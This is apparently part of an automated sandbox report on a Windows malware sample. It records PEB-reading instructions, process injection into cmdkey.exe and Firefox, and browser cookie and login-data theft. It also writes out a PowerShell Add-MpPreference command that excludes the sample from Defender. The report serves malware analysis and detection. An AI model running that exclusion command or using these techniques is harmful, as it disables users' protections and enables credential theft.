            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111273C mov eax, dword ptr fs:[00000030h]4_2_0111273C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111273C mov ecx, dword ptr fs:[00000030h]4_2_0111273C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111273C mov eax, dword ptr fs:[00000030h]4_2_0111273C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111C720 mov eax, dword ptr fs:[00000030h]4_2_0111C720
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111C720 mov eax, dword ptr fs:[00000030h]4_2_0111C720
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122750 mov eax, dword ptr fs:[00000030h]4_2_01122750
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122750 mov eax, dword ptr fs:[00000030h]4_2_01122750
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01164755 mov eax, dword ptr fs:[00000030h]4_2_01164755
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116E75D mov eax, dword ptr fs:[00000030h]4_2_0116E75D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111674D mov esi, dword ptr fs:[00000030h]4_2_0111674D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111674D mov eax, dword ptr fs:[00000030h]4_2_0111674D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111674D mov eax, dword ptr fs:[00000030h]4_2_0111674D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E0750 mov eax, dword ptr fs:[00000030h]4_2_010E0750
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E8770 mov eax, dword ptr fs:[00000030h]4_2_010E8770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118678E mov eax, dword ptr fs:[00000030h]4_2_0118678E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E07AF mov eax, dword ptr fs:[00000030h]4_2_010E07AF
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011947A0 mov eax, dword ptr fs:[00000030h]4_2_011947A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EC7C0 mov eax, dword ptr fs:[00000030h]4_2_010EC7C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011607C3 mov eax, dword ptr fs:[00000030h]4_2_011607C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E47FB mov eax, dword ptr fs:[00000030h]4_2_010E47FB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E47FB mov eax, dword ptr fs:[00000030h]4_2_010E47FB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116E7E1 mov eax, dword ptr fs:[00000030h]4_2_0116E7E1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011027ED mov eax, dword ptr fs:[00000030h]4_2_011027ED
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011027ED mov eax, dword ptr fs:[00000030h]4_2_011027ED
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011027ED mov eax, dword ptr fs:[00000030h]4_2_011027ED
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122619 mov eax, dword ptr fs:[00000030h]4_2_01122619
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115E609 mov eax, dword ptr fs:[00000030h]4_2_0115E609
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E262C mov eax, dword ptr fs:[00000030h]4_2_010E262C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FE627 mov eax, dword ptr fs:[00000030h]4_2_010FE627
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01116620 mov eax, dword ptr fs:[00000030h]4_2_01116620
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01118620 mov eax, dword ptr fs:[00000030h]4_2_01118620
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FC640 mov eax, dword ptr fs:[00000030h]4_2_010FC640
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01112674 mov eax, dword ptr fs:[00000030h]4_2_01112674
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A660 mov eax, dword ptr fs:[00000030h]4_2_0111A660
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A660 mov eax, dword ptr fs:[00000030h]4_2_0111A660
            Source: C:\Users\user\Desktop\r9856_7.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\r9856_7.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\r9856_7.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe"
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtWriteVirtualMemory: Direct from: 0x77762E3C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtMapViewOfSection: Direct from: 0x77762D1C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtNotifyChangeKey: Direct from: 0x77763C2C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtCreateMutant: Direct from: 0x777635CC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtResumeThread: Direct from: 0x777636AC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtProtectVirtualMemory: Direct from: 0x77757B2E
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtQuerySystemInformation: Direct from: 0x77762DFC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtAllocateVirtualMemory: Direct from: 0x77762BFC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtReadFile: Direct from: 0x77762ADC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtDelayExecution: Direct from: 0x77762DDC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtWriteVirtualMemory: Direct from: 0x7776490C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtQueryInformationProcess: Direct from: 0x77762C26
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtResumeThread: Direct from: 0x77762FBC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtCreateUserProcess: Direct from: 0x7776371C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtSetInformationThread: Direct from: 0x777563F9
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtAllocateVirtualMemory: Direct from: 0x77763C9C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtSetInformationThread: Direct from: 0x77762B4C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtQueryAttributesFile: Direct from: 0x77762E6C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtReadVirtualMemory: Direct from: 0x77762E8C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtCreateKey: Direct from: 0x77762C6C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtQuerySystemInformation: Direct from: 0x777648CC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtAllocateVirtualMemory: Direct from: 0x777648EC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtQueryVolumeInformationFile: Direct from: 0x77762F2C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtOpenSection: Direct from: 0x77762E0C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtDeviceIoControlFile: Direct from: 0x77762AEC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtAllocateVirtualMemory: Direct from: 0x77762BEC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtQueryInformationToken: Direct from: 0x77762CAC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtTerminateThread: Direct from: 0x77762FCC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtCreateFile: Direct from: 0x77762FEC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtOpenFile: Direct from: 0x77762DCC
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtOpenKeyEx: Direct from: 0x77762B9C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtSetInformationProcess: Direct from: 0x77762C5C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe NtProtectVirtualMemory: Direct from: 0x77762F9C
            Source: C:\Users\user\Desktop\r9856_7.exe Memory written: C:\Users\user\Desktop\r9856_7.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\r9856_7.exe Section loaded: NULL target: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\r9856_7.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe protection: read write
            Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmdkey.exe Thread register set: target process: 7660
            Source: C:\Windows\SysWOW64\cmdkey.exe Thread APC queued: target process: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
            Source: C:\Users\user\Desktop\r9856_7.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe"
            Source: C:\Users\user\Desktop\r9856_7.exe Process created: C:\Users\user\Desktop\r9856_7.exe "C:\Users\user\Desktop\r9856_7.exe"
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
            Source: C:\Windows\SysWOW64\cmdkey.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: NhrnLLOsLetD.exe, 00000007.00000000.1469765069.0000000001121000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3815745438.0000000001120000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000000.1611659282.0000000001A71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: NhrnLLOsLetD.exe, 00000007.00000000.1469765069.0000000001121000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3815745438.0000000001120000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000000.1611659282.0000000001A71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: NhrnLLOsLetD.exe, 00000007.00000000.1469765069.0000000001121000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3815745438.0000000001120000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000000.1611659282.0000000001A71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
            Source: NhrnLLOsLetD.exe, 00000007.00000000.1469765069.0000000001121000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3815745438.0000000001120000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000000.1611659282.0000000001A71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\r9856_7.exe Queries volume information: C:\Users\user\Desktop\r9856_7.exe VolumeInformation
            Source: C:\Users\user\Desktop\r9856_7.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\r9856_7.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\r9856_7.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\r9856_7.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match, File source: 4.2.r9856_7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.r9856_7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\cmdkey.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\cmdkey.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\cmdkey.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
